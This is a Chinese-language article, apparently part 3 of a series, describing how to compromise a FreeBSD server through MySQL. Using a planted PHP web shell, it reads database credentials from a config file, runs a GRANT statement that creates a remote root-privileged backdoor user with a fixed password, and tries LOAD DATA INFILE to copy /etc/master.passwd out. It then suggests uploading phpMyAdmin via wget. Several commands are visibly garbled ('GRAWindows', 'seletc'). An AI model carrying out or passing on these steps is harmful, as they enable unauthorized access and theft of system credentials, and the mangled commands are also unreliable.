利用MySQL安全检测FreeBSD服务器(3)

通过文件Globalvar.inc读取数据库信息如下:

$ethink4u_db = "web123"; // database info

$ethink4u_db_user = "Root";

$ethink4u_db_passwd = "";

$ethink4u_db_host = "localhost";

进入Phpspy.php的“SQL的查询”页面,连接数据库,连接的数据名不是上面的“web123”而是“MySQL”,连接成功后,输入如下命令:

GRAWindows ALL PRIVILEGES ON *.* TO system@’%’IDEWindowsIFIED BY ’askyou’ WITH GRAWindows OPTION

一个远程的具有Root权限的用户“system”,密码为:“askyou”就建成了!这样就可以通过牛族MYSQL连接器远程连接,整个数据库的生杀大权就掌握在你的手中了!

连接后执行如下命令来读取/etc/master.passwd:

user mysql; //打开数据库mysql

create table yongge(str TEXT); //创建表yongge

load data infile “//etc//master.passwd” into table yongge;把文件master.passwd读到表中

seletc * from yongge into outfile “//tmp//passwd”;把表中内容输出到passwd文件中

drop table yongge; 删除表

马上查看/tmp/passwd文件的内容,怎么是空的?估计我拥有这的个Root权限只是对数据有最大限权,可以任意操纵数据库,而非系统的Root。

换一种思路吧!我们给它上传一个PhpMyAdmin-2[1].6.0-pl3.zip,也可以利用Wget命令下载下一个:“Wget [options] [URL-list]”,然后利用 Unzip命令解压(MS Windows下的压缩软件Winzip压缩的文件可以用Unzip命令,该命令用于解扩展名为.zip的压缩文件)。

小知识:Wget的参数较多,但大部分应用只需要如下几个常用的参数:

-r 递归;对于HTTP主机,Wget首先下载URL指定的文件,然后(如果该文件是一个HTML文档的话)递归下载该文件所引用(超级连接)的所有文件(递归深度由参数-l指定)。对FTP主机,该参数意味着要下载URL指定的目录中的所有文件,递归方法与HTTP主机类似。

-N 时间戳:该参数指定Wget只下载更新的文件,也就是说,与本地目录中的对应文件的长度和最后修改日期一样的文件将不被下载。

-m 镜像:相当于同时使用-r和-N参数。

-l  设置递归级数;默认为5。-l1相当于不递归;-l0为无穷递归;注意,当递归深度增加时,文件数量将呈指数级增长。

-t  设置重试次数。当连接中断(或超时)时,Wget将试图重新连接。如果指定-t0,则重试次数设为无穷多。

-c 指定断点续传功能。实际上,Wget默认具有断点续传功能,只有当你使用别的FTP工具下载了某一文件的一部分,并希望Wget接着完成此工作的时候,才需要指定此参数。

内容版权声明:除非注明,否则皆为本站原创文章。

转载注明出处:https://www.heiqu.com/wwpjwf.html